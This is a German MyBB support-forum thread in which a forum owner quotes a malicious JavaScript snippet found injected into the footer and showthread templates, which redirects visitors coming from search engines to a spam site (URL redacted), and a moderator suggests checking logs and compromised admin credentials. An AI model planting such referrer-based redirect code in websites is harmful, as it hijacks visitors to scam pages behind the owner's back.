MyBB.de Forum
Sicherheitsproblem? - Druckversion

+- MyBB.de Forum (https://www.mybb.de/forum)
+-- Forum: MyBB 1.8.x (https://www.mybb.de/forum/forum-87.html)
+--- Forum: Allgemeiner Support (https://www.mybb.de/forum/forum-88.html)
+--- Thema: Sicherheitsproblem? (/thread-38361.html)



Sicherheitsproblem? - iKrass - 11.09.2022

Heute stellte ich fest, dass eine unerwünschte Weiterleitung aktiv geworden ist: Sucht man mein Forum mit einer Suchmaschine, klickt auf den Ergebnislink in der Trefferliste, dann landet man nicht im Forum, sondern wird sofort weitergeleitet nach *Link entfernt* - der übliche miese Sexpillendreck.

Mies. Also bin ich der Sache auf den Grund gegangen und habe mir die Forendatenbank direkt angesehen. Darin tauchte in der Tabelle "mybb_templates" in den Feldern "footer" und "showthread" folgendes auf:

PHP-Code:
PHP-Code:
<script type='text/javascript'> <!--
if(
document.referrer.indexOf("google")>-1document.write("<meta http-equiv='refresh' content='0.1; URL=*Link entfernt*'>");
if(
document.referrer.indexOf("yahoo")>-1document.write("<meta http-equiv='refresh' content='0.1; URL=*Link entfernt*'>");
if(
document.referrer.indexOf("live")>-1document.write("<meta http-equiv='refresh' content='0.1; URL=*Link entfernt*'>");
if(
document.referrer.indexOf("web.de")>-1document.write("<meta http-equiv='refresh' content='0.1; URL=*Link entfernt*'>");
if(
document.referrer.indexOf("lycos")>-1document.write("<meta http-equiv='refresh' content='0.1; URL=*Link entfernt*'>");
if(
document.referrer.indexOf("t-online")>-1document.write("<meta http-equiv='refresh' content='0.1; URL=*Link entfernt*'>");
if(
document.referrer.indexOf("altavista")>-1document.write("<meta http-equiv='refresh' content='0.1; URL=*Link entfernt*'>");
//-->
</script


Wie kommt das da rein? Ich habs mal von Hand gelöscht. Ist das ein Sicherheitsproblem von sql oder von Mybb?


RE: Sicherheitsproblem? - StefanT - 12.09.2022

(11.09.2022, 22:29)iKrass schrieb: Wie kommt das da rein?
Leider lässt sich diese Frage nicht per Ferndiagnose beantworten. Möglicherweise findest du eine Antwort in den Logs des Forums und des Servers. Es ist auch denkbar, dass die Zugangsdaten eines Admins kompromittiert wurden (z.B. weil das Passwort noch an anderer Stelle verwendet wurde).

Welche MyBB-Version verwendest du? Hast du das Admin-CP abgesicht?